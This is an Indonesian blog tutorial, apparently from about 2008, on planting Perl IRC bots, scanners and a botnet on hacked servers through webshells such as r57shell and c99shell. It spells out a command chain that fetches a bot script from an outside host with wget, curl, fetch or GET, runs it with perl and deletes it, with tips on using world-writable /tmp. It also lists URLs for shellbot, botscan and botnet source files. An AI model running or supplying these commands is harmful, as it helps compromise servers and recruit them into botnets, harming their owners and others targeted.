buat-bot-perl-dan-bot-scan

Saking banyaknya bot perl sampai-sampai jadi binggung mau pakai yang mana.
ada yang botperl yang bisa scan trus bisa nmap, trus bisa juga di jadiin shell, banyak banget pilihannya……..

langsung aja dehh… pusing jadinya mikirin itu semuaa….

untuk load botperl peralatan yang sangat perlu adalah source botperlnya dan juga shell atau webshell yang ber-safe mode off.

kalau webshellnya ber-safe mode on, nggak bisa di gunakan untuk meload bot, soalnya nggak ada untuk memasukkan perintah, tapi lain halnya dengan menggunakan include. (lain waktu bahasnya yach…)
yang ber-safe mode on bisa di gunakan untuk membuat botphp dengan cara injek lihat cara buatnya di buat-bot-php-dengan-injekan dengan injekan.
kalau yang webshell safe mode off bisa untuk meload botperl karena ada untuk mengetikan perintah.

kalau udah ada source botperl dan juga target tinggal lanjutkan dengan meload bot.

sebenarnya masih banyak jalan untuk bisa meload bot, sama halnya dengan bot-bot yang lain.
yang lebih enak juga kalau udah ada web hosting sendiri sebagai penyimpanan data source code bot, atau juga injekan-injekannya sepeti r57shell, c99shell atau c100, dan juga GFSshell dEel El deh.

kalau memang nggak ada web hosting yach tinggal di buat aja ko, gampang banget, khan banyak situs gratis tuhh yach jadiin aja tuh tempat nyimpen data, khan enakk….. untuk web yang gratis dapat di lihat di free-web-hosting

singkatnya, yang di butuhkan adalah :
1. web/situs/webhosting.
untuk menyimpan source code, injekan, atau data lain.
2. source code botperl.
kalau nggak ada sourcenya, yach nggak jadi deh buatnya, paling botnya masuk chan orang lain kalau kamu load pake botorang lain Very Happy .
3. shell/webshell.
kalau webshell yang ber-safe mode off.
kalau semua udah ada tinggal kerjaannya langsung atau loadbotnya langsung.

langkah kerjanya :

kalau untuk sekaligus menjalankannya.
wget http://henca.prohosts.org/chibot.txt;chmod 755 perl chibot.txt;perl chibot.txt;rm -rf chibot.txt;ls -la

kalau download sourcenya tidak bisa menggunakan wget, dapat juga dengan menggunakan :
lwp-download
curl
fetch
GET

untuk contohnya penggunaannya dengan cara :

lwp-download http://henca.prohosts.org/chibot.txt
curl -o botperl.txt http://henca.prohosts.org/chibot.txt atau curl -o http://henca.prohosts.org/chibot.txt
penggunaan pilihan -o untuk membuat nama file baru dengan nama botperl.txt
fetch http://henca.prohosts.org/chibot.txt
GET http://henca.prohosts.org/chibot.txt

untuk jelasnya dari cara diatas kalau satu-satu gini neh, cara di bawah ini sama dengan yang ada di atas. :

wget http://henca.prohosts.org/chibot.txt [enter]
chmod 755 perl chibot.txt [enter]
perl chibot.txt [enter]
rm -rf chibot.txt [enter]
ls -la [enter]

penjelasannya :

wget http://henca.prohosts.org/chibot.txt [enter] <– memasukkan sourcenya kedalam komputer/situs target
chmod 755 perl chibot.txt [enter] <— memberikan permision execute peda file chibot.txt, boleh juga nggak
perl chibot.txt [enter] <– menjalankan file bot dengan perintah perl karena itu file perl boleh juga ekstensinya *.pl
rm -rf chibot.txt [enter] <– menghapus file chibot.txt
ls -la [enter] <– melihat file

kalau mau menjalankan botperl yang khususnya, menggunakan webshell, harus di tempat yang permnya 777, supaya lebih leluasa wgetnya.
atau kita juga bisa pindah direktory ke /tmp atau dengan mengetikan cd yang di ikuti dengan perm 777 misalnya cd /tmp karena biasanya direktory /tmp permnya 777, tapi nggak semua server loh gitu, tergantung kalau emang kita beruntung. Very Happy

kalau ada yang kurang ntar saya tambah, kayaknya neh tulisan belum sempurna…
namanya juga belajar khan.

oh iya nehh source botscannya ama botperl dan juga botnet.
http://scan.prohosts.org/main.txt <– Botscan yang baru
http://henca.prohosts.org/chibot.txt <– yang ini scanner shellbot
http://henca.prohosts.org/netdo.txt <– yang ini botnet
http://henca.prohosts.org/scan9.txt <— yang ini punya botscan morgan v9
http://scan.prohosts.org/botscan.txt <– yang ini botscan tapi versi lama

kayaknya masih banyak lagi dehh.. ntar tak tulis semua botperlnya…

==========
File Di atas Tidak Di Ubah dengan Aslinya yang ada di blog pertama samada.wordpress

update link bot beserta Id yang digunakan :
http://anakdompu.by.ru/special/

List File In Special
[Text Document] alls.txt                                 08-Apr-2008 02:02  3.5K 
[Text Document] bro.txt 08-Apr-2008 01:59 46K
[Text Document] id.txt 08-Apr-2008 01:46 1.3K
[Text Document] idku.txt 08-Apr-2008 01:48 2.0K
[Text Document] insting.txt 08-Apr-2008 01:35 1.5K
[Text Document] md5.txt 08-Apr-2008 01:49 2.8K
[Text Document] pbot.txt 08-Apr-2008 01:47 22K
[Text Document] special.txt 29-Apr-2008 14:06 1.9K
[Text Document] superbot.txt 08-Apr-2008 01:47 36K
buat-bot-perl-dan-bot-scan buat-bot-perl-dan-bot-scan Reviewed by Furkan Samadha on 8:12 AM Rating: 5